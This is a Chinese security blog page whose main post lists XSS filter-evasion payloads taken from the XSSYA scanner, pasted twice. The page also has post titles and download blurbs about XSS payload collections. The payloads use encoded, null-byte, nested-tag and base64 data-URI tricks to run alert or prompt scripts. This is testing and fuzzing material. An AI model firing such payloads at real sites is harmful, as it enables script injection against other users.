- 浏览: 278263 次
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
1. 代码来自xssya.py
http://packetstorm.interhost.co.il/UNIX/scanners/XSSYA-master.zip
"%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E",
"1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E",
"<script>alert('xssya')</script>",
"'';!--\"<XSS>=&{()}",
"%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E"
"<scr<script>ipt>alert(1)</scr<script>ipt>",
"%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e",
"%3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit",
"%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a",
"%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e",
"<iframesrc=\"javascript:alert(2)\">",
"<iframe/src=\"data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">",
"<form action=\"Javascript:alert(1)\"><input type=submit>",
"<isindex action=data:text/html, type=image>",
"<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">",
"<svg/onload=prompt(1);>",
"<marquee/onstart=confirm(2)>/",
"<body onload=prompt(1);>",
"<q/oncut=open()>",
"<a onmouseover=location=’javascript:alert(1)>click",
"<svg><script>alert(/1/)</script>",
"</script><script>alert(1)</script>",
"<scri%00pt>alert(1);</scri%00pt>",
"<scri%00pt>confirm(0);</scri%00pt>",
"5\x72\x74\x28\x30\x29\x3B'>rhainfosec",
"<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>",
"<marquee/onstart=confirm(2)>",
"<A HREF=\"http://www.google.com./\">XSS</A>",
"<svg/onload=prompt(1);>"
http://packetstorm.interhost.co.il/UNIX/scanners/XSSYA-master.zip
"%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E",
"1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E",
"<script>alert('xssya')</script>",
"'';!--\"<XSS>=&{()}",
"%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E"
"<scr<script>ipt>alert(1)</scr<script>ipt>",
"%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e",
"%3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit",
"%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a",
"%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e",
"<iframesrc=\"javascript:alert(2)\">",
"<iframe/src=\"data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">",
"<form action=\"Javascript:alert(1)\"><input type=submit>",
"<isindex action=data:text/html, type=image>",
"<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">",
"<svg/onload=prompt(1);>",
"<marquee/onstart=confirm(2)>/",
"<body onload=prompt(1);>",
"<q/oncut=open()>",
"<a onmouseover=location=’javascript:alert(1)>click",
"<svg><script>alert(/1/)</script>",
"</script><script>alert(1)</script>",
"<scri%00pt>alert(1);</scri%00pt>",
"<scri%00pt>confirm(0);</scri%00pt>",
"5\x72\x74\x28\x30\x29\x3B'>rhainfosec",
"<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>",
"<marquee/onstart=confirm(2)>",
"<A HREF=\"http://www.google.com./\">XSS</A>",
"<svg/onload=prompt(1);>"
发表评论
-
linux 安装scrapy
2015-09-07 13:06 568由于scrapy对python3支持不是很好,所以使用pyth ... -
nginx reverse proxy cofinguration
2015-08-28 15:18 394based on our case, we need to h ... -
wpscan
2015-08-01 10:39 404https://www.digitalocean.com/co ... -
arachni-web-ui使用
2015-06-10 01:04 2119最近在玩儿arachni,想试试arachni-ui-web, ... -
HACKING NODEJS AND MONGODB
2015-06-04 23:52 313http://blog.websecurify.com/201 ... -
php object inject
2015-05-29 00:45 317解释: http://securitycafe.ro/2015 ... -
[转]Forcing XXE Reflection through Server Error Messages
2015-05-19 01:10 416原文地址:https://blog.netspi.com/fo ... -
CVE-2011-2461
2015-03-31 01:19 389http://blog.nibblesec.org/2015/ ... -
[译]从配置错误的web server中dump git数据
2015-03-26 01:07 540原文地址:https://blog.netspi.com/du ... -
[转]Microsoft Access sqli
2015-03-18 00:57 401https://milo2012.wordpress.com/ ... -
[转]sqlmap注入Microsoft Access
2015-03-18 00:49 1557https://github.com/sqlmapprojec ... -
crossdomain.xml
2015-03-12 01:23 621参考: https://hackerone.com/repor ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4029原文地址:https://jimshaver.net/2015 ... -
xxe方法
2015-02-01 18:32 819原文地址:http://www.christian-schne ... -
owasp zed--Web Sockets
2015-01-31 01:16 611http://digi.ninja/blog/zap_web_ ... -
memcached
2015-01-25 01:56 0http://www.sensepost.com/blog/4 ... -
[译]linux使用软连接读取本地文件
2015-01-25 00:28 1940原文地址:http://josipfranjkovic.blo ... -
linux install firefix&plugin
2015-01-22 20:56 4161. download firefox&plugins ... -
Sinatra--超级轻量级web框架
2015-01-17 00:30 615Sinatra是一个超轻量级web框架 介绍:http://w ... -
Shellshock示例
2014-12-19 01:21 294来自:http://pastebin.com/Qbgn09Wa ...
相关推荐
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
总结的XSS的payload,可以直接使用,直接进行攻击,各种payload
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
2020年仍然有效的一些XSS Payload
8k加语句,一次插个爽
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
Tiny-XSS-有效载荷短XSS有效负载的集合,可以在不同的上下文中使用。 此处提供了演示: : 当前有效负载<!-- If you control the name, will work on Firefox in any context, will fail in chromium in DOM --&...
xss 各种绕waf脚本语句
XSS 盗取cookie payload 4 Cookie的后利用 3 XSS 盗取cookie payload 实例演示 2 XSS 盗取cookie payload 原理分析 1 cookie简介 目录 cookie简介 Cookie 并不是它的原意“甜饼”的意思, 而是一个保存在客户机中的...
一些关于xss的payload
各类xss漏洞payload,包含:没有事件处理程序、没有空间、无斜杠(/)、没有等号(=)、不带尖括号(>)、无提示,确认,提示、类payload
:rocket: 跨站点脚本(XSS)漏洞有效负载列表 :rocket: 概述 : 跨站点脚本(XSS)攻击是一种注入,其中恶意脚本被注入到原本良性和可信任的网站中。 当攻击者使用Web应用程序将恶意代码(通常以浏览器脚本的形式)...
XSS漏洞 DOM型测试 payload代码 这是测试跨脚本攻击是否有DOM型XSS的漏洞,适合网络安全初学者进行测试。 跨脚本攻击漏洞是top10的一种。
XSS Platform集成了一些常见的XSS Payload,可以很方便的利用漏洞对网站进行渗透。网上有一些现成的xss平台,不过由于担心自己的食物被别人窃取等等的原因,很多人选择自己搭建一个平台,这样既方便又实用。那么如何...
Web应用安全:XSS盗取cookiepayload(实验习题).docx
共计100+条xss突破测试小技巧本版本翻译自国外的XSS_Cheat_Sheet_2020_Edition.pdf副本,源文件可在本项目内直接下载整理完毕的测试payload清单文件为: xss_payload_list.txt整理不易,少侠,留个小星星再走吧(ฅ>...
XSS Receiver基于 Flask 的 xss 接收 + payload 管理平台,主要功能:在特定路由上保存访问历史以及携带数据命中特定路由时发送邮件动态切换路由及其对应的 payload 文件管理、编辑 payloadDocker 快速部署安装clone...
5 构造无需交互的payload&绕过事件过滤 5.1 onerror/onload 事件 5.2 onfocus与autofocus 5.3 onblur与autofocus 5.4 标签的ontoggle事件 5.5 flash-xss的自动触发 5.6 任意标签的自动触发 6 CSP Bypass 7 XSS ...
:rocket: (XSS)有效负载列表 :rocket: 概述 已编译供公众使用的XSS列表。 您可以将其用作扫描仪的有效载荷 让我们连接: :
frame2canvas 当某些资源被做了referer限制时,无法直接请求得到正确返回内容。...插入xss payload,用iframe包含同源页面,读取iframe的document.body,使用html2canvas截图并以post传输到攻击者服务端。